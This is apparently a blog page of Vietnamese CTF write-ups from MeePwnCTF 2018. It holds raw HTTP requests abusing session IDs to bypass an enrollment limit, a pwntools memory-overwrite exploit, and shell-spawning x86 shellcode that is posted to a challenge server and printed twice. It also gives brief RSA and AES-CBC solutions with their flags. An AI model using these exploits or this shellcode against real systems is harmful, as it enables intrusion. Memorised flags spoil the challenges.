# 0xBAD MINTON
## Generate token which has more than 3 courses enrolled
* Login to one account by multiple `PHPSESSID` value, after login with `PHPSESSID=z1`, change that value and login again. E.g: z1,z2,z3
```
GET /login.php?username=tokiomonster17&password=tokiomonster17 HTTP/1.1
Host: 178.128.84.72
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Referer: http://178.128.84.72/courses.php
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=z1
Connection: close
```
* Enroll courses with PHPSESSID: z1,z2,z3
```
GET /login.php?action=enroll HTTP/1.1
Host: 178.128.84.72
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Referer: http://178.128.84.72/courses.php
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=z2
Connection: close
```
* Now we have token that have more than 3 courses enrolled
```
GET /courses.php HTTP/1.1
Host: 178.128.84.72
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Referer: http://178.128.84.72/courses.php
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=z3
Connection: close
```
```
<a class="btn btn-outline-primary" style="border-radius: 5px 0px 0px 5px;" href="http://178.128.84.72/login.php?action=logout">Hello tokiomonster17</a>
<a class="btn btn-outline-success" style="border-radius: 0px 0px 0px 0px;" href="#">Enrolled: 6 courses</a>
<a class="btn btn-outline-danger" style="border-radius: 0px 5px 5px 0px;" href="#3ae3566f837d529c3104a2734ecc596347918aaf78db90501d380b66d0de8992">Token: 3ae3566f837d529c3104a2734ecc596347918aaf78db90501d380b66d0de8992</a>
```
## Pwn
```
from pwn import *
r = remote('178.128.84.72',9997)
flag = 0x604070
token = '3ae3566f837d529c3104a2734ecc596347918aaf78db90501d380b66d0de8992'
r.recvuntil("Token> ")
r.sendline(token)
for i in range(6):
r.recvuntil(">")
r.send(p64(flag)*128)
r.recvuntil(">")
r.sendline("3")
r.interactive()
```
Thứ Sáu, 20 tháng 7, 2018
babysandbox - Meepwnctf 2018
from pwn import *
import requests
import base64
shellcode = "\x58\x85\xC0\x0F\x84\x61\x00\x00\x00\x68\x80\xc7\xd7\xff\x5e\x66\x68\x7a\x69\x5f\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x66\x56\x66\x57\x66\x6a\x02\x89\xe1\x6a\x10\x51\x53\x89\xe1\xcd\x80\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\xeb\xce\x31\xC0\x40\x89\xC3\xCD\x80"
payload = {"payload":base64.b64encode(shellcode)}
s = requests.session()
s.get("http://178.128.100.75/")
r = s.post("http://178.128.100.75/exploit",json=payload)
print r.content
import requests
import base64
shellcode = "\x58\x85\xC0\x0F\x84\x61\x00\x00\x00\x68\x80\xc7\xd7\xff\x5e\x66\x68\x7a\x69\x5f\x6a\x66\x58\x99\x6a\x01\x5b\x52\x53\x6a\x02\x89\xe1\xcd\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x66\x56\x66\x57\x66\x6a\x02\x89\xe1\x6a\x10\x51\x53\x89\xe1\xcd\x80\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\xeb\xce\x31\xC0\x40\x89\xC3\xCD\x80"
payload = {"payload":base64.b64encode(shellcode)}
s = requests.session()
s.get("http://178.128.100.75/")
r = s.post("http://178.128.100.75/exploit",json=payload)
print r.content
Thứ Năm, 19 tháng 7, 2018
Bazik - ESOR Meepwnctf 2018
BAZIK
ESOR
nc 206.189.92.209 31333
Thấy rằng bài này có dạng RSA
Từ public key có được n, e ( e = 3 nhỏ )
Ta thấy rằng decrypt data test có dạng: Your OTP for transaction #731337 in ABCXYZ Bank is 451150457.
Theo mình thì flag cũng có thể là dạng như vậy nên suy ra đây là tấn công dạng Coopersmith
Attack
Solution
flag: MeePwnCTF{blackbox-rsa-is-0xd34d}
Bài này là crypto AES-CBC
Bài cho ta IV, Key, cho luôn hàm decrypt rồi nên khá là dễ
Ta chỉ việc lấy 1 đoạn mã hóa rồi về dựng lại code lên print chỗ hiện kết quả là ok
flag: MeePwnCTF{pooDL3-this-is-la-vie-en-rose-P00dle!}
Đăng ký:
Bài đăng (Atom)